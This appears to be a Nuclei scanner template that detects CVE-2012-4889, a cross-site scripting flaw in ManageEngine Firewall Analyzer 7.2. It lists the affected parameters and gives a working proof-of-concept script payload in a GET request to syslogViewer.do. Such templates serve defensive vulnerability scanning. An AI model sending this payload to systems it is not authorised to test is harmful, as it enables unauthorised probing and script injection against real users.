id: CVE-2012-4889 info: name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. remediation: | Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 epss-percentile: 0.90513 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: manageengine product: firewall_analyzer tags: cve,cve2012,xss,manageengine,packetstorm http: - method: GET path: - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502205f611ec2e0cc4f9b54fa7fabe8d3d72bd1a4fdbeb34f21e17eeab5612ce21bd50221008ba154199b748ea441f94fd17d8f17d600a7725981ab5dead0884570bfe8ad1a:922c64590222798bb761d5b6d8e72950